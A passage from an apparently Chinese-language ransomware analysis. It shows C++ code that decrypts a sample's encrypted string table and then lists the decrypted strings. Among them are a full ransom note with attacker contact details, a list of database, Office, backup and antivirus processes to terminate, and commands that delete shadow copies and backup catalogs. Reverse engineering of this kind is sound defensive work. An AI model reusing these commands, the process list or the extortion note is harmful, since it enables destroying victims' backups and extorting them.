        {123, 199, 186, 153, 219, 54, 0, 16, 231, 44, 71, 12, 205, 66, 82, 13, 66, 160, 88, 236, 154, 60, 171, 105, 171, 227, 9, 41, 57, 94, 32, 123},
        {91, 92, 65, 75, 10, 153, 168, 126, 207, 108, 122, 152, 185, 100, 107, 73, 85, 126, 249, 2, 102, 216, 32, 48, 173, 163, 221, 126, 46, 169, 175, 191},
        {73, 154, 60, 102, 80, 39, 20, 37, 16, 1, 171, 207, 96, 82, 123, 165, 31, 27, 205, 126, 55, 247, 180, 1, 119, 49, 212, 121, 203, 181, 25, 184}, 
        {106, 148, 67, 49, 8, 181, 99, 70, 221, 173, 244, 91, 148, 57, 27, 208, 124, 180, 8, 150, 27, 183, 87, 60, 10, 20, 120, 241, 213, 25, 252, 88},
        {176, 172, 163, 118, 20, 201, 255, 181, 205, 48, 93, 75, 17, 3, 11, 18, 76, 166, 237, 124, 79, 119, 85, 243, 23, 87, 178, 9, 237, 65, 70, 232, 251, 101, 9, 54, 55, 123, 179, 7, 234, 130, 170, 101, 169, 22, 252, 74, 233, 49, 101, 237, 235, 3, 26, 187, 108, 179, 199, 96, 150, 37, 104, 125},
        {78, 62, 210, 220, 177, 142, 250, 52, 52, 58, 113, 142, 154, 170, 129, 120, 70, 34, 254, 202, 87, 106, 6, 137, 118, 64, 210, 201, 223, 166, 141, 44, 54, 81, 55, 190, 223, 147, 109, 134, 195, 157, 14, 222, 215, 117, 53, 85, 67, 203, 200, 162, 236, 217, 163, 216, 243, 6, 7, 34, 251, 29, 141, 238, 39, 42, 20, 146, 58, 254, 64, 191, 5, 240, 182, 63, 80, 33, 254, 71, 232, 87, 76, 149, 45, 178, 232, 116, 101, 38, 124, 36, 135, 92, 117, 82, 128, 42, 34, 199, 9, 1, 139, 174, 98, 140, 6, 176, 52, 107, 9, 26, 77, 7, 125, 204, 47, 32, 126, 131, 121, 24, 234, 29, 247, 82, 184, 3}, {170, 163, 0, 183, 231, 51, 142, 209, 196, 158, 219, 242, 62, 162, 33, 164, 63, 24, 49, 252, 95, 194, 250, 10, 115, 157, 153, 19, 18, 240, 195, 196, 178, 24, 100, 174, 111, 217, 164, 210, 65, 129, 26, 38, 67, 96, 133, 166, 246, 58, 46, 252, 232, 186, 151, 165, 107, 168, 181, 118, 26, 43, 182, 156, 129, 90, 92, 108, 73, 233, 180, 118, 255, 197, 32, 98, 167, 93, 69, 187, 34, 146, 161, 43, 249, 186, 202, 174, 38, 150, 183, 70, 226, 217, 248, 128, 66, 142, 106, 66, 56, 156, 207, 58, 253, 113, 220, 193, 92, 185, 32, 146, 48, 39, 94, 35, 66, 157, 6, 216, 37, 150, 236, 152, 104, 217, 249, 249},
        {246, 90, 179, 234, 48, 142, 1, 26, 36, 136, 217, 47, 237, 39, 148, 183, 90, 52, 241, 83, 206, 43, 5, 13, 203, 219, 225, 101, 6, 190, 3, 70, 84, 81, 155, 234, 52, 88, 75, 21, 60, 165, 20, 36, 118, 21, 128, 11, 126, 233, 21, 107, 160, 49, 220, 133, 107, 16, 147, 19, 163, 9, 158, 246, 46, 40, 42, 123, 63, 57, 219, 105, 105, 92, 145, 51, 2, 188, 172, 174, 31, 181, 110, 138, 233, 29, 63, 169, 66, 180, 179, 227, 49, 90, 49, 115},
        {172, 40, 133, 17, 93, 47, 207, 47, 88, 33, 169, 159, 208, 62, 66, 62, 138, 133, 43, 164, 180, 21, 35, 65, 138, 194, 105, 63, 72, 27, 215, 62, 187, 171, 29, 51, 48, 168, 242, 106, 199, 183, 238, 170, 45, 180, 253, 252, 200, 62, 150, 176, 114, 101, 182, 251, 190, 225, 197, 194, 102, 124, 222, 229, 165, 1, 90, 252, 242, 189, 16, 147, 114, 225, 110, 170, 27, 76, 242, 52, 201, 124, 37, 0, 132, 200, 62, 116, 26, 164, 143, 155, 23, 73, 214, 204, 33, 242, 15, 0, 220, 65, 0, 11, 96, 186, 104, 76, 229, 33, 215, 236, 190, 198, 62, 242, 187, 204, 202, 86, 32, 23, 206, 210, 107, 27, 174, 164, 116, 28, 92, 74, 132, 63, 235, 127, 236, 192, 119, 239, 162, 43, 6, 227, 79, 229, 162, 227, 200, 226, 91, 25, 41, 201, 4, 132, 144, 47, 47, 13},
        {11, 196, 195, 32, 5, 100, 134, 104, 84, 247, 183, 154, 223, 203, 231, 212, 249, 49, 234, 142, 101, 230, 90, 161, 74, 23, 113, 45, 103, 154, 194, 223},
        {225, 27, 175, 232, 18, 37, 161, 122, 76, 83, 88, 208, 28, 104, 151, 150, 163, 88, 178, 12, 210, 196, 186, 7, 100, 84, 199, 125, 35, 111, 137, 22},
        {99, 192, 5, 231, 196, 191, 149, 122, 168, 127, 92, 174, 236, 236, 214, 170, 99, 242, 62, 64, 27, 193, 183, 109, 195, 35, 151, 195, 241, 61, 229, 139},
        {220, 25, 66, 162, 171, 84, 248, 250, 166, 89, 113, 126, 137, 254, 36, 236, 12, 162, 255, 132, 147, 174, 234, 208, 85, 214, 140, 58, 18, 110, 38, 19},
        {225, 122, 168, 104, 101, 254, 28, 98, 196, 73, 255, 234, 209, 50, 85, 59, 215, 4, 226, 206, 4, 104, 132, 56, 18, 67, 88, 151, 197, 2, 113, 127, 69, 221, 16, 243, 76, 58, 31, 9, 95, 116, 231, 41, 124, 176, 43, 219, 80, 250, 227, 102, 37, 99, 70, 154, 210, 218, 203, 39, 185, 172, 105, 226, 61, 186, 80, 177, 99, 220, 135, 98, 81, 16, 9, 92, 31, 164, 131, 178, 171, 9, 183, 126, 180, 152, 146, 86, 97, 108, 146, 58, 5, 97, 94, 71, 250, 186, 95, 57, 197, 129, 20, 161, 241, 231, 58, 137, 100, 166, 203, 100, 219, 53, 174, 245, 209, 156, 214, 41, 79, 235, 133, 119, 11, 253, 45, 195},
        {63, 1, 129, 0, 184, 38, 2, 45, 48, 182, 29, 246, 225, 57, 153, 32, 252, 56, 102, 191, 106, 27, 20, 53, 211, 92, 58, 203, 65, 57, 143, 240},
        {71, 167, 222, 114, 175, 188, 242, 180, 12, 127, 185, 48, 145, 172, 16, 227, 102, 70, 142, 174, 3, 180, 205, 4, 190, 126, 219, 132, 156, 135, 215, 63, 162, 33, 205, 197, 253, 115, 81, 242, 236, 110, 69, 130, 119, 169, 19, 213, 221, 23, 80, 9, 244, 210, 120, 198, 148, 249, 103, 32, 23, 37, 191, 165, 141, 250, 145, 222, 137, 45, 185, 181, 239, 28, 33, 73, 121, 36, 92, 88, 37, 59, 76, 103, 69, 55, 3, 44, 90, 106, 171, 241, 177, 20, 39, 193},
        {71, 222, 90, 85, 178, 32, 186, 251, 190, 85, 181, 183, 104, 108, 40, 65, 9, 60, 190, 160, 123, 93, 92, 3, 123, 136, 133, 229, 80, 51, 62, 238},
        {236, 8, 245, 211, 134, 204, 47, 173, 97, 61, 239, 77, 34, 14, 198, 120, 44, 109, 241, 215, 133, 77, 145, 142, 6, 168, 90, 21, 254, 249, 26, 218},
        {59, 87, 121, 19, 80, 78, 243, 5, 97, 202, 60, 179, 250, 199, 105, 178, 26, 149, 210, 101, 6, 161, 215, 103, 120, 178, 93, 99, 209, 150, 136, 181, 19, 242, 57, 147, 253, 219, 122, 48, 59, 111, 51, 2, 131, 25, 90, 221, 111, 228, 223, 145, 201, 41, 34, 169, 39, 109, 145, 177, 129, 157, 11, 57, 174, 161, 95, 41, 6, 105, 156, 0, 29, 96, 194, 19, 20, 133, 81, 240, 186, 84, 155, 76, 84, 15, 226, 230, 151, 252, 96, 176, 156, 202, 74, 193, 228, 6, 61, 205, 55, 15, 199, 68, 227, 218, 250, 7, 139, 43, 159, 42, 239, 54, 176, 28, 102, 27, 206, 71, 204, 171, 71, 249, 254, 51, 52, 178, 173, 226, 162, 107, 80, 186, 148, 255, 43, 144, 102, 168, 28, 153, 205, 204, 117, 93, 42, 228, 229, 147, 173, 67, 82, 33, 124, 67, 25, 177, 110, 209, 20, 90, 128, 2, 103, 133, 187, 109, 240, 154, 49, 65, 213, 38, 150, 74, 240, 209, 21, 167, 89, 72, 177, 179, 135, 111, 54, 145, 71, 70, 94, 119},
        {91, 47, 23, 232, 198, 63, 14, 123, 10, 15, 137, 32, 228, 93, 19, 41, 157, 82, 6, 83, 50, 236, 50, 57, 149, 66, 140, 61, 76, 155, 176, 70, 93, 84, 127, 86, 142, 185, 211, 80, 34, 97, 95, 238, 38, 223, 43, 52, 27, 235, 20, 42, 116, 51, 52, 165, 98, 254, 148, 221, 125, 233, 64, 164, 154, 182, 24, 104, 74, 145, 234, 27, 239, 233, 45, 188, 118, 23, 251, 127, 57, 233, 46, 180, 212, 197, 177, 74, 201, 132, 230, 34, 9, 28, 2, 234},
        {82, 95, 95, 51, 123, 134, 16, 124, 201, 95, 89, 140, 151, 210, 135, 22, 9, 120, 72, 172, 144, 146, 118, 135, 251, 84, 81, 164, 2, 201, 90, 66, 219, 55, 201, 185, 209, 227, 138, 167, 128, 215, 59, 170, 115, 144, 227, 74, 207, 142, 89, 180, 233, 20, 11, 202, 12, 33, 100, 0, 182, 189, 235, 0}
    };

    for (int i = 0; i < cipher_list.size(); i++)
    {
        if (!CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey)) {
            std::cerr << "CryptImportKey failed: " << GetLastError() << std::endl;
            if (hProv) CryptReleaseContext(hProv, 0);
            return 1;
        }
        DWORD dataLen = (DWORD)cipher_list[i].size();
        if (!CryptDecrypt(hKey, 0, 0, 0, cipher_list[i].data(), &dataLen)) {
            std::cerr << "CryptDecrypt failed: " << GetLastError() << std::endl;
            CryptDestroyKey(hKey);
            CryptReleaseContext(hProv, 0);
            return 1;
        }
        cipher_list[i].resize(dataLen);
        std::cout << "Sign: " << sign_list[i] << std::endl;
        //std::cout << "明文: " << cipher_list[i].data() << std::endl;
        std::cout << "Data ";
        PrintHex(cipher_list[i]);
        std::cout << "------------------------------" << std::endl;
    }
    CryptDestroyKey(hKey);
    CryptReleaseContext(hProv, 0);
    return 0;
}

这里得到的结果还是不太好看,就又拿python又处理了一下,结果如下,后续就可以根据标志来进行查表,可以快速的了解到解密的字符。

解密的字符串
标志:  0x0
解密字符串:SRC
解密HEX: 5300520043000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1
解密字符串:chewbacca@cock.li
解密HEX: 630068006500770062006100630063006100400063006f0063006b002e006c006900000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x4
解密字符串:boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;+README-WARNING+.txt;desktop.ini;
解密HEX: 62006f006f0074002e0069006e0069003b0062006f006f00740066006f006e0074002e00620069006e003b006e0074006c00640072003b006e0074006400650074006500630074002e0063006f006d003b0069006f002e007300790073003b002b0052004500410044004d0045002d005700410052004e0049004e0047002b002e007400780074003b006400650073006b0074006f0070002e0069006e0069003b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x5
解密字符串:sqlbrowser.exe;sqlwriter.exe;sqlservr.exe;msmdsrv.exe;MsDtsSrvr.exe;sqlceip.exe;fdlauncher.exe;Ssms.exe;sqlagent.exe;fdhost.exe;ReportingServicesService.exe;msftesql.exe;pg_ctl.exe;postgres.exe;UniFi.exe;armsvc.exe;IntelCpHDCPSvc.exe;OfficeClickToRun.exe;DellOSDService.exe;DymoPnpService.exe;Agent.exe;FJTWMKSV.exe;IPROSetMonitor.exe;IRMTService.exe;MBCloudEA.exe;QBCFMonitorService.exe;QBIDPService.exe;RstMwService.exe;TeamViewer_Service.exe;dasHost.exe;IntelCpHeciSvc.exe;RAVBg64.exe;vds.exe;unsecapp.exe;TodoBackupService.exe;MediaButtons.exe;IAStorDataMgrSvc.exe;jhi_service.exe;LMS.exe;DDVDataCollector.exe;DDVCollectorSvcApi.exe;TeamViewer.exe;tv_w32.exe;tv_x64.exe;Microsoft.Photos.exe;MicrosoftEdge.exe;ApplicationFrameHost.exe;browser_broker.exe;MicrosoftEdgeSH.exe;MicrosoftEdgeCP.exe;RtkNGUI64.exe;WavesSvc64.exe;OneDrive.exe;DYMO.DLS.Printing.Host.exe;FtLnSOP.exe;FjtwMkup.exe;FTPWREVT.exe;FTErGuid.exe;qbupdate.exe;QBWebConnector.exe;ShellExperienceHost.exe;RuntimeBroker.exe;IAStorIcon.exe;PrivacyIconClient.exe;SupportAssistAgent.exe;SecurityHealthService.exe;taskhostw.exe;taskhosta.exe;wijca.exe;ktfwswe.exe;HeciServer.exe;mdm.exe;ULCDRSvr.exe;WLIDSVC.EXE;WLIDSVCM.EXE;GoogleCrashHandler.exe;GoogleCrashHandler64.exe;RAVCpl64.exe;igfxtray.exe;hkcmd.exe;igfxpers.exe;PsiService_2.exe;UNS.exe;taskeng.exe;AdobeARM.exe;LenovoReg.exe;dwm.exe;wuauclt.exe;avp.exe;FBService.exe;LBAEvent.exe;PDFProFiltSrvPP.exe;avpsus.exe;klnagent.exe;vapm.exe;ScanToPCActivationApp.exe;BrStMonW.exe;BrCtrlCntr.exe;concentr.exe;redirector.exe;BrccMCtl.exe;BrYNSvc.exe;Receiver.exe;BrCcUxSys.exe;LSCNotify.exe;SelfServicePlugin.exe;wfcrun32.exe;HPNETW~1.EXE;HPScan.exe;taskhost.exe;Teams.exe;AuthManSvr.exe;WLXPhotoGallery.exe;outlook.exe;prevhost.exe;excel.exe;chrome.exe;AcroRd32.exe;RdrCEF.exe;vssadmin.exe;WmiPrvSE.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;agntsrvc.exe;mydesktopqos.exe;isqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;encsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;infopath.exe;msaccess.exe;mspub.exe;onenote.exe;powerpnt.exe;steam.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;
解密HEX: 730071006c00620072006f0077007300650072002e006500780065003b00730071006c007700720069007400650072002e006500780065003b00730071006c00730065007200760072002e006500780065003b006d0073006d0064007300720076002e006500780065003b004d00730044007400730053007200760072002e006500780065003b00730071006c0063006500690070002e006500780065003b00660064006c00610075006e0063006800650072002e006500780065003b00530073006d0073002e006500780065003b00730071006c006100670065006e0074002e006500780065003b006600640068006f00730074002e006500780065003b005200650070006f007200740069006e0067005300650072007600690063006500730053006500720076006900630065002e006500780065003b006d007300660074006500730071006c002e006500780065003b00700067005f00630074006c002e006500780065003b0070006f007300740067007200650073002e006500780065003b0055006e006900460069002e006500780065003b00610072006d007300760063002e006500780065003b0049006e00740065006c004300700048004400430050005300760063002e006500780065003b004f006600660069006300650043006c00690063006b0054006f00520075006e002e006500780065003b00440065006c006c004f005300440053006500720076006900630065002e006500780065003b00440079006d006f0050006e00700053006500720076006900630065002e006500780065003b004100670065006e0074002e006500780065003b0046004a00540057004d004b00530056002e006500780065003b004900500052004f005300650074004d006f006e00690074006f0072002e006500780065003b00490052004d00540053006500720076006900630065002e006500780065003b004d00420043006c006f0075006400450041002e006500780065003b0051004200430046004d006f006e00690074006f00720053006500720076006900630065002e006500780065003b005100420049004400500053006500720076006900630065002e006500780065003b005200730074004d00770053006500720076006900630065002e006500780065003b005400650061006d005600690065007700650072005f0053006500720076006900630065002e006500780065003b0064006100730048006f00730074002e006500780065003b0049006e00740065006c004300700048006500630069005300760063002e006500780065003b0052004100560042006700360034002e006500780065003b007600640073002e006500780065003b0075006e007300650063006100700070002e006500780065003b0054006f0064006f004200610063006b007500700053006500720076006900630065002e006500780065003b004d00650064006900610042007500740074006f006e0073002e006500780065003b0049004100530074006f00720044006100740061004d00670072005300760063002e006500780065003b006a00680069005f0073006500720076006900630065002e006500780065003b004c004d0053002e006500780065003b00440044005600440061007400610043006f006c006c006500630074006f0072002e006500780065003b0044004400560043006f006c006c006500630074006f0072005300760063004100700069002e006500780065003b005400650061006d005600690065007700650072002e006500780065003b00740076005f007700330032002e006500780065003b00740076005f007800360034002e006500780065003b004d006900630072006f0073006f00660074002e00500068006f0074006f0073002e006500780065003b004d006900630072006f0073006f006600740045006400670065002e006500780065003b004100700070006c00690063006100740069006f006e004600720061006d00650048006f00730074002e006500780065003b00620072006f0077007300650072005f00620072006f006b00650072002e006500780065003b004d006900630072006f0073006f00660074004500640067006500530048002e006500780065003b004d006900630072006f0073006f00660074004500640067006500430050002e006500780065003b00520074006b004e00470055004900360034002e006500780065003b0057006100760065007300530076006300360034002e006500780065003b004f006e006500440072006900760065002e006500780065003b00440059004d004f002e0044004c0053002e005000720069006e00740069006e0067002e0048006f00730074002e006500780065003b00460074004c006e0053004f0050002e006500780065003b0046006a00740077004d006b00750070002e006500780065003b00460054005000570052004500560054002e006500780065003b00460054004500720047007500690064002e006500780065003b00710062007500700064006100740065002e006500780065003b005100420057006500620043006f006e006e006500630074006f0072002e006500780065003b005300680065006c006c0045007800700065007200690065006e006300650048006f00730074002e006500780065003b00520075006e00740069006d006500420072006f006b00650072002e006500780065003b0049004100530074006f007200490063006f006e002e006500780065003b005000720069007600610063007900490063006f006e0043006c00690065006e0074002e006500780065003b0053007500700070006f00720074004100730073006900730074004100670065006e0074002e006500780065003b00530065006300750072006900740079004800650061006c007400680053006500720076006900630065002e006500780065003b007400610073006b0068006f007300740077002e006500780065003b007400610073006b0068006f007300740061002e006500780065003b00770069006a00630061002e006500780065003b006b007400660077007300770065002e006500780065003b0048006500630069005300650072007600650072002e006500780065003b006d0064006d002e006500780065003b0055004c004300440052005300760072002e006500780065003b0057004c00490044005300560043002e004500580045003b0057004c00490044005300560043004d002e004500580045003b0047006f006f0067006c00650043007200610073006800480061006e0064006c00650072002e006500780065003b0047006f006f0067006c00650043007200610073006800480061006e0064006c0065007200360034002e006500780065003b00520041005600430070006c00360034002e006500780065003b00690067006600780074007200610079002e006500780065003b0068006b0063006d0064002e006500780065003b00690067006600780070006500720073002e006500780065003b0050007300690053006500720076006900630065005f0032002e006500780065003b0055004e0053002e006500780065003b007400610073006b0065006e0067002e006500780065003b00410064006f0062006500410052004d002e006500780065003b004c0065006e006f0076006f005200650067002e006500780065003b00640077006d002e006500780065003b00770075006100750063006c0074002e006500780065003b006100760070002e006500780065003b004600420053006500720076006900630065002e006500780065003b004c00420041004500760065006e0074002e006500780065003b00500044004600500072006f00460069006c007400530072007600500050002e006500780065003b006100760070007300750073002e006500780065003b006b006c006e006100670065006e0074002e006500780065003b007600610070006d002e006500780065003b005300630061006e0054006f0050004300410063007400690076006100740069006f006e004100700070002e006500780065003b0042007200530074004d006f006e0057002e006500780065003b00420072004300740072006c0043006e00740072002e006500780065003b0063006f006e00630065006e00740072002e006500780065003b00720065006400690072006500630074006f0072002e006500780065003b0042007200630063004d00430074006c002e006500780065003b004200720059004e005300760063002e006500780065003b00520065006300650069007600650072002e006500780065003b004200720043006300550078005300790073002e006500780065003b004c00530043004e006f0074006900660079002e006500780065003b00530065006c006600530065007200760069006300650050006c007500670069006e002e006500780065003b00770066006300720075006e00330032002e006500780065003b00480050004e004500540057007e0031002e004500580045003b00480050005300630061006e002e006500780065003b007400610073006b0068006f00730074002e006500780065003b005400650061006d0073002e006500780065003b0041007500740068004d0061006e005300760072002e006500780065003b0057004c005800500068006f0074006f00470061006c006c006500720079002e006500780065003b006f00750074006c006f006f006b002e006500780065003b00700072006500760068006f00730074002e006500780065003b0065007800630065006c002e006500780065003b006300680072006f006d0065002e006500780065003b004100630072006f0052006400330032002e006500780065003b005200640072004300450046002e006500780065003b00760073007300610064006d0069006e002e006500780065003b0057006d006900500072007600530045002e006500780065003b006f007200610063006c0065002e006500780065003b006f0063007300730064002e006500780065003b006400620073006e006d0070002e006500780065003b00730079006e006300740069006d0065002e006500780065003b00610067006e00740073007200760063002e006500780065003b006d0079006400650073006b0074006f00700071006f0073002e006500780065003b006900730071006c0070006c00750073007300760063002e006500780065003b0078006600730073007600630063006f006e002e006500780065003b006d0079006400650073006b0074006f00700073006500720076006900630065002e006500780065003b006f0063006100750074006f0075007000640073002e006500780065003b0065006e0063007300760063002e006500780065003b00660069007200650066006f00780063006f006e006600690067002e006500780065003b007400620069007200640063006f006e006600690067002e006500780065003b006f0063006f006d006d002e006500780065003b006d007900730071006c0064002e006500780065003b006d007900730071006c0064002d006e0074002e006500780065003b006d007900730071006c0064002d006f00700074002e006500780065003b006400620065006e006700350030002e006500780065003b0073007100620063006f007200650073006500720076006900630065002e006500780065003b0069006e0066006f0070006100740068002e006500780065003b006d0073006100630063006500730073002e006500780065003b006d0073007000750062002e006500780065003b006f006e0065006e006f00740065002e006500780065003b0070006f0077006500720070006e0074002e006500780065003b0073007400650061006d002e006500780065003b007400680065006200610074002e006500780065003b00740068006500620061007400360034002e006500780065003b007400680075006e0064006500720062006900720064002e006500780065003b0076006900730069006f002e006500780065003b00770069006e0077006f00720064002e006500780065003b0077006f00720064007000610064002e006500780065003b000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x6
解密字符串:+README-WARNING+.txt
解密HEX: 2b0052004500410044004d0045002d005700410052004e0049004e0047002b002e00740078007400000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x7
解密字符串:YOUR_FILES_ARE_ENCRYPTED
解密HEX: 59004f00550052005f00460049004c00450053005f004100520045005f0045004e00430052005900500054004500440000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x8
解密字符串:::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: chewbacca@cock.li
Or you can contact us via TOX: ADA6E26332F26451E45768179C771CA87A7F0F4E234DA8D882888F505494925DCF274A3EA555
You don't know about TOX? Go to https://tox.chat

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don t want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.

:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

解密HEX: 3a3a3a204772656574696e6773203a3a3a0d0a0d0a4c6974746c65204641513a0d0a0d0a2e312e200d0a513a2057686174732048617070656e3f0d0a413a20596f75722066696c65732068617665206265656e20656e637279707465642e205468652066696c652073747275637475726520776173206e6f742064616d616765642c207765206469642065766572797468696e6720706f737369626c6520736f2074686174207468697320636f756c64206e6f742068617070656e2e0d0a0d0a2e322e200d0a513a20486f7720746f207265636f7665722066696c65733f0d0a413a20496620796f75207769736820746f206465637279707420796f75722066696c657320796f752077696c6c206e65656420746f207061792075732e0d0a0d0a2e332e200d0a513a20576861742061626f75742067756172616e746565733f0d0a413a20497473206a757374206120627573696e6573732e205765206162736f6c7574656c7920646f206e6f7420636172652061626f757420796f7520616e6420796f7572206465616c732c206578636570742067657474696e672062656e65666974732e20496620776520646f206e6f7420646f206f757220776f726b20616e64206c696162696c6974696573202d206e6f626f64792077696c6c20636f6f70657261746520776974682075732e20497473206e6f7420696e206f757220696e746572657374732e0d0a546f20636865636b20746865206162696c697479206f662072657475726e696e672066696c65732c20796f752063616e2073656e6420746f20757320616e7920322066696c657320776974682053494d504c4520657874656e73696f6e73286a70672c786c732c646f632c206574632e2e2e206e6f7420646174616261736573212920616e64206c6f772073697a6573286d61782031206d62292c2077652077696c6c2064656372797074207468656d20616e642073656e64206261636b20746f20796f752e2054686174206973206f75722067756172616e7465652e0d0a0d0a2e342e0d0a513a20486f7720746f20636f6e74616374207769746820796f753f0d0a413a20596f752063616e20777269746520757320746f206f7572206d61696c626f783a2063686577626163636140636f636b2e6c690d0a4f7220796f752063616e20636f6e746163742075732076696120544f583a20414441364532363333324632363435314534353736383137394337373143413837413746304634453233344441384438383238383846353035343934393235444346323734413345413535350d0a596f7520646f6e2774206b6e6f772061626f757420544f583f20476f20746f2068747470733a2f2f746f782e636861740d0a0d0a2e352e0d0a513a20486f772077696c6c207468652064656372797074696f6e2070726f636573732070726f63656564206166746572207061796d656e743f0d0a413a204166746572207061796d656e742077652077696c6c2073656e6420746f20796f75206f7572207363616e6e65722d6465636f6465722070726f6772616d20616e642064657461696c656420696e737472756374696f6e7320666f72207573652e205769746820746869732070726f6772616d20796f752077696c6c2062652061626c6520746f206465637279707420616c6c20796f757220656e637279707465642066696c65732e0d0a0d0a2e362e0d0a513a204966204920646f6e92742077616e7420746f20706179206261642070656f706c65206c696b6520796f753f0d0a413a20496620796f752077696c6c206e6f7420636f6f7065726174652077697468206f75722073657276696365202d20666f722075732c2069747320646f6573206e6f74206d61747465722e2042757420796f752077696c6c206c6f736520796f75722074696d6520616e6420646174612c206361757365206f6e6c792077652068617665207468652070726976617465206b65792e20496e207072616374696365202d2074696d65206973206d756368206d6f72652076616c7561626c65207468616e206d6f6e65792e0d0a0d0a0d0a0d0a3a3a3a4245574152453a3a3a0d0a444f4e27542074727920746f206368616e676520656e637279707465642066696c657320627920796f757273656c6621200d0a496620796f752077696c6c2074727920746f2075736520616e7920746869726420706172747920736f66747761726520666f7220726573746f72696e6720796f75722064617461206f7220616e7469766972757320736f6c7574696f6e73202d20706c65617365206d616b652061206261636b757020666f7220616c6c20656e637279707465642066696c6573210d0a416e79206368616e67657320696e20656e637279707465642066696c6573206d617920656e7461696c2064616d616765206f66207468652070726976617465206b657920616e642c20617320726573756c742c20746865206c6f737320616c6c20646174612e0d0a000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x9
解密字符串:vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

解密HEX: 76737361646d696e2064656c65746520736861646f7773202f616c6c202f71756965740a776261646d696e2064656c65746520636174616c6f67202d71756965740a776d696320736861646f77636f70792064656c6574650a657869740a0000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xa
解密字符串: RSA15b+ϼ O Y  \ R  u\         t\         SE   { m\   愅 YR 3\ l B 4Z  d   Ӗ\ eKBW "i          hi#         <  O  1$ o P*   + PNc X 
解密HEX: 0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xc
解密字符串:n z 
解密HEX: 6edc7a8e00000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xe
解密字符串:
解密HEX: 0000040000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0xf
解密字符串:
解密HEX: 0000100000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x10
解密字符串:SOFTWARE\Microsoft\Windows NT\CurrentVersion
解密HEX: 534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e0000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x11
解密字符串:ProductId
解密HEX: 50726f6475637449640000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x12
解密字符串:\\?\
解密HEX: 5c005c003f005c00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x13
解密字符串:waiting for network...
解密HEX: 770061006900740069006e006700200066006f00720020006e006500740077006f0072006b002e002e002e000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x14
解密字符串:runas
解密HEX: 720075006e006100730000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x16
解密字符串:SystemDrive
解密HEX: 530079007300740065006d004400720069007600650000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x17
解密字符串:ComSpec
解密HEX: 43006f006d005300700065006300000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x18
解密字符串:.[%08X].[%s].%s
解密HEX: 2e005b0025003000380058005d002e005b00250073005d002e00250073000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x19
解密字符串:X:\ProgramData\microsoft\windows\caches
解密HEX: 58003a005c00500072006f006700720061006d0044006100740061005c006d006900630072006f0073006f00660074005c00770069006e0064006f00770073005c00630061006300680065007300000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
